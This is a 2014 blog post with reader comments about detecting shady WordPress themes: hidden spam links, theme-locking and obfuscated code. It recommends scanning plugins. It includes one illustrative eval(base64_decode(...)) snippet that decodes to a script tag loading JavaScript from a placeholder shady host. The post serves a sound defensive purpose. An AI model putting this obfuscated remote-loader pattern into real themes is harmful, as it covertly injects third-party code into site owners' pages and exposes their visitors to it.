How to Make Sure You’re Not Using a Shady WordPress Theme

Aug 1 2014 by Karol K | 12 Comments

I can still remember how excited I was back in 2008 when I first discovered WordPress (late-adopter, I know).

What was particularly impressive for me was that I could change the designs of my WordPress sites with minimal effort.

And so the hunt for the perfect theme began!

As far as I can recall, there weren’t that many paid/premium themes back then. And, to be honest, I wasn’t even taking the possibility of paying for a theme into consideration (since money was a bit tight) so I was kind of stuck with free themes by default.

All was well for a while. My test sites and personal blogs were running just fine, until, one day, I noticed some strange links in the footer.

Those unusual links pointed not only to the theme creator’s site, but also to some questionable sites that had spammy anchor texts like "pay day loan", "cheap home insurance", "seo services", and so forth.

No problem, I thought, removing these should only take a minute.

But, to my surprise, those links were neither in the theme’s Widgets screen nor anywhere in the theme’s source code.

I searched all of the theme’s files in bulk with a source code editor, looking for those anchor texts.

I even went through the database using a SQL SELECT statement.

Nothing.

So how was it possible for these links to remain under the radar?

Well, as it turns out, this is the story of my first encounter with encrypted code in WordPress themes.

Shady WordPress theme practices

Encrypted code is just one piece of the puzzle; there are other distasteful WordPress theme development practices going on.

Static links pointing to suspicious websites

Not all static links (or embedded links) in WordPress themes are bad.

A lot of times, they are just links that acknowledge the developer of the theme. As long as the links are decent, and granted that the theme user is informed that the links will be displayed on their site, then they might be alright.

However, in some instances, they may be going to spammy websites. When links start pointing to casino sites, online pharmacies or some shady biz-op products, all without the site owner’s knowledge, then it’s a different story.

Search engines simply won’t be pleased to find out that your site is linking to the dark side of the internet, and they may penalize you for it even if you’re an unwitting participant.

Theme-locking

Some links and code blocks in shady WordPress themes are "locked in" with JavaScript and/or PHP. Removing these links or code blocks will make the entire WordPress site go blank, displacing your content with a message telling you that you need to put the links/code blocks back in place to be able to remove the message from your site.

Encrypted code

Encrypted code is a term in the WordPress community for code snippets that are purposely being obfuscated from the user of the theme. The intent of encrypted code is to hide portions of the theme’s source code and to make these portions difficult to remove. Encrypted code can do a variety of things, such as generating links to third-party sites and interfering with the user experience.

Why these things are happening

Some companies go out of their way to include harmful elements in their WordPress themes.

Why would they do this? You might ask. Because WordPress themes are a great online marketing tool.

The market for themes keeps growing year over year. It’s been reported that 18.9 percent of all sites are built with WordPress. And, at one point, all those site owners will go out looking for nice themes.

The way some people capitalize on this opportunity is by creating a great-looking WordPress theme and then including hidden links and obfuscated code in the theme.

Imagine what their reach could be like if they get even a few hundred domains installing their theme.

How to make sure you’re using a trustworthy theme

If you’re considering the use of a new WordPress theme, below are some steps that can help you stay out of trouble.

Of course, the first best option is to use a theme obtained from a reputable source and created by a trustworthy theme developer, both of which can significantly reduce the potential of these shady practices being employed. It wouldn’t hurt to go through these steps despite the reputation of your candidate theme.

Step 1: Install theme-checking plugins

It is very possible to investigate every theme by hand just by going through its files. But doing so with a trusty plugin is much quicker, and potentially more thorough.

You’ll need two plugins for this step.

  1. TAC scans all of your installed WordPress themes for potentially malicious code.
  2. Theme-Check tests your themes for compliance with all the latest WordPress standards and best practices.

Step 2: Test the theme for encrypted code

Before activating a WordPress theme, you should first test it in a safe development environment. One such environment is on your PC. However, if you don’t have time for that, you should still be fine as long as you don’t activate the theme before running your tests.

To see what the TAC plugin has to say about your new theme, in the WordPress administration screen, go to Appearance > TAC.

Scroll down to your theme to see if there are any issues.

Screenshot of a TAC test result.

If TAC says that everything’s fine (and you’re using a theme from a trusted source) then it probably is.

However, if it indicates the presence of any encrypted code then you need to be cautious.

It’s recommended to never use themes that have encrypted code. The main reason for this is that you have absolutely no control over what’s inside the encrypted block of code. It could be anything: third-party scripts, data-mining, ads, link-building schemes, etc.

Some PHP and JavaScript functions associated with encrypted code are designed to help developers perform difficult but benign processes, such as data-encoding conversion or parsing. But in the wrong hands, and in the context of WordPress theme development, they are often used to hide shady source code.

If you want to do some sniffing around on your own, you can batch-search theme files with a text editor like Notepad++. Look for the keyword "base64_decode".

The base64_decode() PHP function, together with the eval() function, is commonly used to execute encrypted code.

For example, if the encrypted code you find looks anything like this (just an example, not actual code) stay away:

$o="eHQvamF2YXNjcmlwdCI+PC9zY3JpcHQ+";
eval(base64_decode("PHNjcmlwdCBzcmM9Ii8vYS1zaGFkeS1zaXRlLmNvbS9qcy9zcGFtbGlua3MuanMiIHR5cGU9InRl" . $o));

Step 3: Evaluate all the static links

TAC will also let you know when it stumbles upon any static links inside the theme. When you click the Details button, you will see the exact files and lines where those links occur.

Find embedded static links with TAC.

Static links are common in free WordPress themes, and they’re not necessarily bad. For instance, some themes require attribution. The first thing you should do is decide whether or not you’re okay with those links being on your site. In the end, if you’re not okay with any link, you just shouldn’t use the theme.

When it comes to static links, most of the time the party’s going on in the footer.php file.

For instance, the theme I checked when doing research for this piece had links pointing to a site titled "Botox Tel Aviv" with an anchor text consisting entirely of non-Latin characters:

An example of an embedded static link in a WordPress theme.

For testing purposes, you can check what happens if you remove an embedded link. Sometimes, you will discover that your entire site will stop working as a result of this action. And that is exactly what happened to my test site; when I removed the link, the site stopped working and the content was replaced with this message:

The message being displayed on all pages when a static link is removed.

If you want to investigate some more, this is where the other plugin, Theme-Check, comes into play.

Go to Appearance > Theme Check and run a test for the theme in question. Most likely, the plugin will report a lot of stuff, so you will have to browse around for a while to find what might be causing the problems.

In my case, the instructions found in line 124 of the functions.php file were to blame:

Theme-check finding a WordPress theme error.

Conclusion

The moral of the story is that you should choose WordPress themes carefully. Before using any theme, it’s best to perform some research and testing on it.

Related Content

About the Author

Karol K is a blogger who’s passionate about WordPress. He works with ThemeIsle, a WordPress theme development company. His work has been published all over the Web, on sites like Web Design Ledger, Quick Sprout, ProBlogger, and others. Reach him at @carlosinho.

12 Comments

Jason W.

August 1st, 2014

I believe I once had it explained to me, that all content created for WordPress must adhere to the licensing of WordPress? So wouldn’t encrypted code in a theme violate WordPress’ Terms of Service/Use?

Eric

August 1st, 2014

Encrypted code??? That’s laughable at best. Maybe obfuscated but not encrypted.

Niki Singh

August 4th, 2014

Thanks for the idea to use TAC Scan. I found some scripts last month on our client’s website who was updating his wordpress website by his own. When I looked on Google search results for the website it was showing some casino related description. The code was actually found in footer.php file and it took almost an hour to figure out the issue. TAC scan is a nice plugin to solve this problem.

Coalesceideas

August 5th, 2014

The same experience and eagerness back to those days, and the links that was included to the theme that I was using is there for almost 2 years, then TAC came to the rescue

Mustafa Gaziani

August 5th, 2014

Hey Karol,

Yes! It’s true that not all static links are bad. But, can’t denied from this that some are.

Thanks for sharing this useful plugins I didn’t hear before about these plugins or even I didn’t know that it is possible to check it.

You provided very useful step by step tutorial with pics I like your effort.

Regards,
Mustafa

Marshall

August 7th, 2014

Thanks for posting this. Good article. I have tried out both plugins on a test site running two production themes. No encrypted code but some links.

Good plugins to know about. I will add them to my must have list.

Lizzy

August 15th, 2014

Very useful article, Thanks! I will be sure to use those plugins to test sites from now on. Do you think a security plugin, like iThemes, can block spammy links?

Anuj Sharma

August 16th, 2014

I never thought something like this would ever exists. Karol, thanks for putting up this article. Really informative.

Karol

August 23rd, 2014

@Jason That is true, every piece of code you release for WordPress has to be under the standard WordPress license. But I’m not quite sure about encrypted code being a violation. In my opinion (although I’m no legal expert), the fact that the code is encrypted doesn’t make it different from any other piece of code. You can still modify it (with some effort), and you can still go around it.

Karol

August 23rd, 2014

@Niki Yeah, those things can become serious if you’re not careful. And sometimes they’re quite difficult to spot, especially if the links are the exact color as the background.

Karol

August 23rd, 2014

@Lizzy Blocking spammy links for good is rather difficult. You’re probably better off doing individual scans and taking action if anything suspicious pops up.

Karol

August 23rd, 2014

Thanks for the comments guys!

Leave a Comment

Subscribe to the comments on this article.

Mobify empowers marketers and developers to create amazing mobile web experiences.

Mobify